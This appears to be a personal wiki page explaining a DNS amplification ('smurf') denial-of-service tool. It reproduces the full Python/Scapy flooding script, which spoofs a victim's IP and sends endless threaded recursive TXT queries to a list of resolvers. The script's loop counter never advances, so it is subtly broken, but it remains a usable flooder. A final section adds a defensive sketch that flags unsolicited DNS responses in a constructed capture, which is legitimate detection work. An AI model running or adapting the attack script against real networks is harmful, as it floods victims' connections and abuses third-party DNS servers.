DoS/DNSSmurf
From charlesreid1
Tool: dnssmurf
Found a DNS smurf tool from K-Metal on pastebin: http://pastebin.com/gTxRQuFY
Here's how it works:
- Read in a list of DNS servers
- Start a large thread pool
- With each thread in the pool, run the attack function
The attack function works as follows:
- Loop over entire list of DNS servers
- Send a crafted DNS request to each server
The real money shot is here: the use of Scapy to craft the DNS request:
```python
p=IP(dst=List[count],src=host)
u=UDP(dport=53,sport=random.randint(1024,65535))/DNS(rd=1,qd=DNSQR(qname="goo.gl", qtype="TXT")) #DNS Query
send(p/u,verbose=0)
```
It sends a UDP-over-IP packet to one of the DNS servers listed in the file, with the source address forged so that it looks like it came from the sheep (the target), which is where the server's reply then goes. The DNS packet is sent to destination port 53, and a random source port is set. The DNS request is a recursive (rd=1) TXT query for "goo.gl".
This is simply run repeatedly, ad infinitum, by as many servers and threads as you'd like, with as many DNS servers as you'd like.
dnssmurf.py:
```python
#!/usr/bin/env python
######################
# DNS AMP dos attack #
#     by K-Metal     #
######################
from scapy.all import *
import threading, sys, random, time

#Proof of Concept
if len(sys.argv) < 2: #Print Help
    print "Usage: "+sys.argv[0]+" <ip> <list> <threads>"
    sys.exit()

host = sys.argv[1] #Variables
File = sys.argv[2]
numthreads = int(sys.argv[3])
threads = []

with open(File) as f: #Read list
    List = f.readlines()

Max = len(List) #Max length of the list

def flood():
    global host
    global List
    global Max
    print "Flooding..."
    while True:
        count = 0
        while count < Max:
            p=IP(dst=List[count],src=host)
            u=UDP(dport=53,sport=random.randint(1024,65535))/DNS(rd=1,qd=DNSQR(qname="goo.gl", qtype="TXT")) #DNS Query
            send(p/u,verbose=0)

for n in range(numthreads): #Multi-threading
    t = threading.Thread(target=flood)
    t.daemon = True
    t.start()
    threads.append(t)

while True: #So CTRL+C kills all threads
    time.sleep(1)
```
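Seen from the spoofed address, this traffic arrives as DNS responses from port 53 that answer queries the host never sent. The following detection sketch is an added example, not part of the original page or of K-Metal's tool: it pairs responses with outstanding queries in a capture and totals the unmatched bytes per resolver. The packet tuple format, the addresses and the `build` helper are constructed for illustration.

```python
import struct
from collections import Counter

def parse_dns(payload):
    """Return (txid, is_response, qname, qtype) from a raw DNS message."""
    txid, flags = struct.unpack("!HH", payload[:4])
    labels, pos = [], 12                      # question follows the 12-byte header
    while payload[pos]:                       # length-prefixed labels, 0 terminates
        n = payload[pos]
        labels.append(payload[pos + 1:pos + 1 + n].decode("ascii", "replace"))
        pos += 1 + n
    (qtype,) = struct.unpack("!H", payload[pos + 1:pos + 3])
    return txid, bool(flags & 0x8000), ".".join(labels), qtype

def unsolicited_responses(packets, local_ip):
    """Bytes of DNS responses, per resolver, that answer no query local_ip sent."""
    pending, reflected = set(), Counter()
    for src, sport, dst, dport, payload in packets:
        try:
            txid, is_resp, qname, qtype = parse_dns(payload)
        except (IndexError, struct.error):
            continue                          # truncated or non-DNS payload
        if src == local_ip and dport == 53 and not is_resp:
            pending.add((dst, sport, txid, qname, qtype))
        elif dst == local_ip and sport == 53 and is_resp:
            key = (src, dport, txid, qname, qtype)
            if key in pending:
                pending.discard(key)          # answer to a query we really sent
            else:
                reflected[src] += len(payload)  # nobody here asked for this
    return reflected

def build(txid, response, qname, qtype, pad=0):
    """Constructed test message; pad stands in for the answer section's size."""
    flags = 0x8180 if response else 0x0100
    q = b"".join(bytes([len(l)]) + l.encode() for l in qname.split(".")) + b"\0"
    return struct.pack("!HHHHHH", txid, flags, 1, 0, 0, 0) + q + struct.pack("!HH", qtype, 1) + bytes(pad)

HOST = "192.0.2.10"  # constructed capture: (src, sport, dst, dport, payload)
SAMPLE = [
    (HOST, 40000, "203.0.113.53", 53, build(1, False, "example.com", 1)),
    ("203.0.113.53", 53, HOST, 40000, build(1, True, "example.com", 1, 16)),
    ("198.51.100.1", 53, HOST, 5555, build(7, True, "goo.gl", 16, 300)),
    ("198.51.100.2", 53, HOST, 6666, build(8, True, "goo.gl", 16, 300)),
    ("198.51.100.1", 53, HOST, 5556, build(9, True, "goo.gl", 16, 300)),
    (HOST, 0, "0.0.0.0", 0, b"\x00"),  # truncated junk, skipped by the parser guard
]

if __name__ == "__main__":
    print(unsolicited_responses(SAMPLE, HOST).most_common())
```

A resolver that keeps appearing in this tally is being used as a reflector; the matched `example.com` exchange is not counted.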